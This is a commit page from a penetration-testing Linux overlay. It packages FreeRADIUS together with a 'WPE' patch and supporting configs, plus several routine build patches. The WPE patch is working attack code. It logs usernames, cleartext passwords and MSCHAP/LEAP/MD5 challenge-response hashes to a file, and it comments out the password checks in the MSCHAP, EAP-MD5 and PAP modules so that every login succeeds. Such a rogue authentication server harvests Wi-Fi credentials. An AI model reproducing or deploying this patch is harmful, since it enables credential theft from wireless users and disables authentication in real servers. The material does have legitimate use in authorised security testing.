Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2026-04-30 10:41:01 +02:00
Code Issues Projects Releases Wiki Activity

freeradius: bump, improved WPE patch (based on opensecurityresearch)

Browse source
This commit is contained in:
Anton Bolshakov 2011-11-07 10:15:35 +00:00
parent 05d9d3db60
commit 679c12ed1b
12 changed files with 2890 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
net-dialup/freeradius/Manifest
View file

@ -1,3 +1,11 @@
AUX clients_wpe.conf 390 RMD160 b97985754c00270fd089d551d113879de917bd82 SHA1 b08d2b2d2456b1de5bb0731aa9504f3ff6cd4767 SHA256 ecc817541c5f49ef6a2ddaf87f5f87b760776375a4239aaa618d48b36e4c2497
AUX eap_wpe.conf 5594 RMD160 9c5697c50892892862f19217bcf555326ba7a910 SHA1 6ab78fc78dfad5794e60d3983cb255423dd8d8d9 SHA256 2ab71bc501bf0f9b1e09e3a97db23c291672b3ae01f15beb4be2b71ceedc4111
AUX freeradius-2.1.10-ipv6.patch 453 RMD160 d6ed447a9f5281cf3958fdf5cdf0fc5b12d3068b SHA1 e7dd7e17fab3f7c6bc4eca3f60ecf66b72c0515d SHA256 15a227b1a9cb213763170e7f030bb30521af26ae1920a4acf51499a6628d492d
AUX freeradius-2.1.10-pkglibdir.patch 2551 RMD160 44d3cc594c68cf925a81ecc73e5f8452cd3f3bdd SHA1 81f96dd2c48bc789a8464a951ee0b3f787b42252 SHA256 19e366a1eba9423185c5a7139f3affd0100a46ac94f5993f84a54cc77251bafc
AUX freeradius-2.1.10-qafixes.patch 56665 RMD160 e95a9122220acd939b75487be387d49ff6ba2186 SHA1 3bc6981c1c77ef833abec646588f0137baa7c78a SHA256 10f8875ed0ca90b6075513030b9ce3cff62386c361ba7d494ca778f438fcf096
AUX freeradius-2.1.10-ssl.patch 582 RMD160 f60a7f54d78e839c88d9424fd13e6afb593271ea SHA1 63b0d96af0b0301f19a1a67beff250b85577b1f7 SHA256 8ba257bea3504f1b800185af49ca0fe2a3f9bf65f0699c73e39f02e712467cef
AUX freeradius-2.1.10-versionless-la-files.patch 2404 RMD160 36ba9fd0dd0a5fd047f1494f238ad01e74d1f9bf SHA1 685f1d36c5199a7226bafcbc2291ff69c1ec7915 SHA256 8668376594966a6440df8a720560602ac290cedf45bce3b23d38b5a8a685c1db
AUX freeradius-2.1.11-wpe.patch 13697 RMD160 f212652e0206e64f4ebfac3a01705cd3c2d6c3be SHA1 7ba7037ea24e126127e4aa76455c2191edb6da8b SHA256 f56257eea5b228c096e781f6aded15f969bc6f7079a53fb73538988593c20649
AUX freeradius-2.1.7-nothreads.patch 514 RMD160 e229224c0ebda40a7383a8c68fe2a0839dbc473c SHA1 f53ab1df226dceb4638da95c83ea4b60001e3102 SHA256 cad3e87971a5824d8f17fa462d7a9b0fe317261704eeebffdc404c4d41f2787a
AUX freeradius-2.1.7-pkglibdir.patch 2547 RMD160 46fa13ce524ba1a61db27d130161464cafdca65f SHA1 0796e1bdd4b65699ccebf5f61dbdb18513464968 SHA256 bd7c15f0c66e80ed07bb98a731217c5260e30d628b7305849d57c907f860b1c1
AUX freeradius-2.1.7-qafixes.patch 3686 RMD160 0860ee3afdec320406b2d2398fc8b73d80ec4e07 SHA1 ea1bc3e906e2d3e6d65f69d78ee2c845775b1004 SHA256 f0b3fc440636eeb33cc42a36d3ff344c816db55a8295bdbe816d00d4214eb1ec
@ -6,5 +14,8 @@ AUX freeradius-2.1.7-versionless-la-files.patch 1747 RMD160 80aba198197d373d70b4
AUX freeradius-2.1.7-wpe.patch 32096 RMD160 ffb2915b98ceac025e00634fdbfef8b75380d557 SHA1 4e6e978269a8c848103c8f0bdfe0a04c74f06a75 SHA256 34ae76dd578ce3a497e93a7479336b2ce6eeb13be204590b8015e060bed3ef8c
AUX radius.conf 129 RMD160 2509d00c869ddb2d4db84e0e4b5a9334ffd69964 SHA1 174194106a6a7698f92e884463f49f0f974cb569 SHA256 2d5b3e1af1299373182f2c8021bdf45c29db5d82b0a077b965a16ded32cb6292
AUX radius.init-r1 1575 RMD160 68e08912962c74ed2bdbe43bb27ae5e0c449254f SHA1 75bae5946776c5b0493b2b2b5cb6ee0de0a2fc6c SHA256 5f20b72e4b627442313818cbe3c31cadfdc747fad18cacdafe58de62812eea41
AUX users_wpe 99 RMD160 1572e695acc914686d24f678357b5c74c500c50e SHA1 12df191c9b926f875a4485c694e6b348aa4df9d0 SHA256 922a318e7f66b3b52b4a1cc53d765ff116567f010d9ce4784b4ae009fe97ca73
DIST freeradius-server-2.1.11.tar.gz 4219356 RMD160 0c47ef980b9442b7673d065be899e1cbd1438a74 SHA1 0e2c8b67e8147c7c74acba7416841d65773dcfa6 SHA256 274ef96aa528d8b759f2fa06f2ba49ecbe1612e99fdedbb7016b557804b16b85
DIST freeradius-server-2.1.7.tar.gz 3894247 RMD160 52225b612af87bdf74844ea361de3701b6a9f3dd SHA1 5fc6b5ddf100aea8abf0ab73f1b13460189fd4f5 SHA256 43504dc7fd2780e576361f9101ed7935d8c34782bb8954336a4196efab59b587
EBUILD freeradius-2.1.7-r1.ebuild 4527 RMD160 341ec7965a50800024d4fd0d1e0fcb98494417b5 SHA1 35c5775389a2e7909c8108f43a3a180dcd0be93e SHA256 8aff4400fd9eefcc9d7577de5dad601bfe694944b3ab569733423bcc203b8f2f
EBUILD freeradius-2.1.11-r1.ebuild 4821 RMD160 fee900e1cbe618392f7fefa99debd6d95ad2fd7e SHA1 e5852a7b39d8541d756f205eb5cd1317ffb11903 SHA256 24df33d5700ce135f6392aef7e2182ae70ea8753cb22834affdace0d4d226b84
EBUILD freeradius-2.1.7-r1.ebuild 4526 RMD160 88d76e6b12bf7818f95bbc68bef61137559270a7 SHA1 9e4c5d0229c56f94131f56f05eff13e445230701 SHA256 2457783dc531a5d3ec1cfc6d7241d587da99f25c8c37ddac4241e13da96e4251

13
net-dialup/freeradius/files/clients_wpe.conf Normal file
View file

@ -0,0 +1,13 @@
#######################################################################
#
# Define RADIUS clients (usually a NAS, Access Point, etc.).
#
#######################################################################
client localhost {
ipaddr = 127.0.0.1
secret = testing123
require_message_authenticator = no
# shortname = localhost
nastype = other # localhost isn't usually a NAS...
}

199
net-dialup/freeradius/files/eap_wpe.conf Normal file
View file

@ -0,0 +1,199 @@
#######################################################################
#
# Whatever you do, do NOT set 'Auth-Type := EAP'. The server
# is smart enough to figure this out on its own. The most
# common side effect of setting 'Auth-Type := EAP' is that the
# users then cannot use ANY other authentication method.
#
# EAP types NOT listed here may be supported via the "eap2" module.
# See experimental.conf for documentation.
#
#######################################################################
# For WPE, you might want to fix /etc/raddb/certs/ca.cnf:
# policy = policy_anything
eap {
default_eap_type = peap
timer_expire = 60
ignore_unknown_eap_types = no
cisco_accounting_username_bug = yes
max_sessions = 4096
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
certdir = ${confdir}/certs
cadir = ${confdir}/certs
private_key_password = whatever
private_key_file = ${certdir}/server.pem
certificate_file = ${certdir}/server.pem
CA_file = ${cadir}/ca.pem
dh_file = ${certdir}/dh
random_file = ${certdir}/random
CA_path = ${cadir}
cipher_list = "DEFAULT"
cache {
enable = no
lifetime = 24 # hours
max_entries = 255
}
verify {
}
ocsp {
enable = no
override_cert_url = yes
url = "http://127.0.0.1/ocsp/"
}
}
ttls {
}
##################################################
#
# !!!!! WARNINGS for Windows compatibility !!!!!
#
##################################################
#
# If you see the server send an Access-Challenge,
# and the client never sends another Access-Request,
# then
#
# STOP!
#
# The server certificate has to have special OID's
# in it, or else the Microsoft clients will silently
# fail. See the "scripts/xpextensions" file for
# details, and the following page:
#
# http://support.microsoft.com/kb/814394/en-us
#
# For additional Windows XP SP2 issues, see:
#
# http://support.microsoft.com/kb/885453/en-us
#
#
# If is still doesn't work, and you're using Samba,
# you may be encountering a Samba bug. See:
#
# https://bugzilla.samba.org/show_bug.cgi?id=6563
#
# Note that we do not necessarily agree with their
# explanation... but the fix does appear to work.
#
##################################################
#
# The tunneled EAP session needs a default EAP type
# which is separate from the one for the non-tunneled
# EAP module. Inside of the TLS/PEAP tunnel, we
# recommend using EAP-MS-CHAPv2.
#
# The PEAP module needs the TLS module to be installed
# and configured, in order to use the TLS tunnel
# inside of the EAP packet. You will still need to
# configure the TLS module, even if you do not want
# to deploy EAP-TLS in your network. Users will not
# be able to request EAP-TLS, as it requires them to
# have a client certificate. EAP-PEAP does not
# require a client certificate.
#
#
# You can make PEAP require a client cert by setting
#
# EAP-TLS-Require-Client-Cert = Yes
#
# in the control items for a request.
#
peap {
# The tunneled EAP session needs a default
# EAP type which is separate from the one for
# the non-tunneled EAP module. Inside of the
# PEAP tunnel, we recommend using MS-CHAPv2,
# as that is the default type supported by
# Windows clients.
default_eap_type = mschapv2
# the PEAP module also has these configuration
# items, which are the same as for TTLS.
copy_request_to_tunnel = no
use_tunneled_reply = no
# When the tunneled session is proxied, the
# home server may not understand EAP-MSCHAP-V2.
# Set this entry to "no" to proxy the tunneled
# EAP-MSCHAP-V2 as normal MSCHAPv2.
proxy_tunneled_request_as_eap = yes
#
# The inner tunneled request can be sent
# through a virtual server constructed
# specifically for this purpose.
#
# If this entry is commented out, the inner
# tunneled request will be sent through
# the virtual server that processed the
# outer requests.
#
virtual_server = "inner-tunnel"
# This option enables support for MS-SoH
# see doc/SoH.txt for more info.
# It is disabled by default.
#
# soh = yes
#
# The SoH reply will be turned into a request which
# can be sent to a specific virtual server:
#
# soh_virtual_server = "soh-server"
}
#
# This takes no configuration.
#
# Note that it is the EAP MS-CHAPv2 sub-module, not
# the main 'mschap' module.
#
# Note also that in order for this sub-module to work,
# the main 'mschap' module MUST ALSO be configured.
#
# This module is the *Microsoft* implementation of MS-CHAPv2
# in EAP. There is another (incompatible) implementation
# of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
# currently support.
#
mschapv2 {
# Prior to version 2.1.11, the module never
# sent the MS-CHAP-Error message to the
# client. This worked, but it had issues
# when the cached password was wrong. The
# server *should* send "E=691 R=0" to the
# client, which tells it to prompt the user
# for a new password.
#
# The default is to behave as in 2.1.10 and
# earlier, which is known to work. If you
# set "send_error = yes", then the error
# message will be sent back to the client.
# This *may* help some clients work better,
# but *may* also cause other clients to stop
# working.
#
# send_error = no
}
}

12
net-dialup/freeradius/files/freeradius-2.1.10-ipv6.patch Normal file
View file

@ -0,0 +1,12 @@
diff -aur freeradius-server-2.1.10.orig/src/lib/udpfromto.c freeradius-server-2.1.10/src/lib/udpfromto.c
--- freeradius-server-2.1.10.orig/src/lib/udpfromto.c 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/udpfromto.c 2011-02-09 22:41:46.000000000 +0100
@@ -87,7 +87,7 @@
* This should actually be standard IPv6
*/
proto = IPPROTO_IPV6;
- flag = IPV6_PKTINFO;
+ flag = IPV6_2292PKTINFO;
#endif
#endif
} else {

61
net-dialup/freeradius/files/freeradius-2.1.10-pkglibdir.patch Normal file
View file

@ -0,0 +1,61 @@
diff -Naur freeradius-server-2.1.10.orig/Make.inc.in freeradius-server-2.1.10/Make.inc.in
--- freeradius-server-2.1.10.orig/Make.inc.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/Make.inc.in 2011-02-09 17:51:46.000000000 +0100
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Naur freeradius-server-2.1.10.orig/raddb/radiusd.conf.in freeradius-server-2.1.10/raddb/radiusd.conf.in
--- freeradius-server-2.1.10.orig/raddb/radiusd.conf.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/raddb/radiusd.conf.in 2011-02-09 17:51:57.000000000 +0100
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Naur freeradius-server-2.1.10.orig/src/modules/Makefile freeradius-server-2.1.10/src/modules/Makefile
--- freeradius-server-2.1.10.orig/src/modules/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/Makefile 2011-02-09 17:52:11.000000000 +0100
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2011-02-09 17:50:58.000000000 +0100
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:52:53.000000000 +0100
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,11 +164,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi

2018
net-dialup/freeradius/files/freeradius-2.1.10-qafixes.patch Normal file
View file

File diff suppressed because it is too large Load diff

11
net-dialup/freeradius/files/freeradius-2.1.10-ssl.patch Normal file
View file

@ -0,0 +1,11 @@
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:41:44.000000000 +0100
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h

40
net-dialup/freeradius/files/freeradius-2.1.10-versionless-la-files.patch Normal file
View file

@ -0,0 +1,40 @@
diff -Naur freeradius-server-2.1.10.orig/src/lib/Makefile freeradius-server-2.1.10/src/lib/Makefile
--- freeradius-server-2.1.10.orig/src/lib/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/Makefile 2011-02-09 17:39:25.000000000 +0100
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:40:00.000000000 +0100
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak 2011-02-09 17:40:17.000000000 +0100
@@ -147,6 +147,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:39:43.000000000 +0100
@@ -171,6 +171,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi

364
net-dialup/freeradius/files/freeradius-2.1.11-wpe.patch Normal file
View file

@ -0,0 +1,364 @@
diff -uNr freeradius-server-2.1.11-orig//raddb/radiusd.conf.in freeradius-server-2.1.11-wpe//raddb/radiusd.conf.in
--- freeradius-server-2.1.11-orig//raddb/radiusd.conf.in 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//raddb/radiusd.conf.in 2011-09-28 08:11:09.334011116 -0700
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.11-orig//src/include/radiusd.h freeradius-server-2.1.11-wpe//src/include/radiusd.h
--- freeradius-server-2.1.11-orig//src/include/radiusd.h 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/include/radiusd.h 2011-09-28 08:11:47.402010538 -0700
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.11-orig//src/main/auth.c freeradius-server-2.1.11-wpe//src/main/auth.c
--- freeradius-server-2.1.11-orig//src/main/auth.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/auth.c 2011-09-28 08:13:26.638011007 -0700
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.11-orig//src/main/log.c freeradius-server-2.1.11-wpe//src/main/log.c
--- freeradius-server-2.1.11-orig//src/main/log.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/log.c 2011-09-28 08:15:24.746011013 -0700
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,55 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.11-orig//src/main/mainconfig.c freeradius-server-2.1.11-wpe//src/main/mainconfig.c
--- freeradius-server-2.1.11-orig//src/main/mainconfig.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/mainconfig.c 2011-09-28 08:16:13.782011003 -0700
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-28 08:18:03.338011000 -0700
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-28 08:18:28.462010992 -0700
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-28 08:19:11.958011003 -0700
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.11-wpe//src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_mschap/rlm_mschap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_mschap/rlm_mschap.c 2011-09-28 08:09:38.470011004 -0700
@@ -662,9 +662,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -679,9 +681,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE - always succeed
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1131,7 +1135,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1240,7 +1244,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
- if (memcmp(output, packet->value, 16) != 0) {
- return 0;
- }
+ //WPE - always succeed
+ //if (memcmp(output, packet->value, 16) != 0) {
+
+ //return 0;
+ //}
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500
@@ -473,6 +473,10 @@
return RLM_MODULE_NOOP;
}
+ /* WPE */
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
+
/*
* Can't do PAP if there's no password.
*/
@@ -604,6 +608,8 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE - always succeed */
+ /*
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +617,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +650,13 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +680,13 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +705,13 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
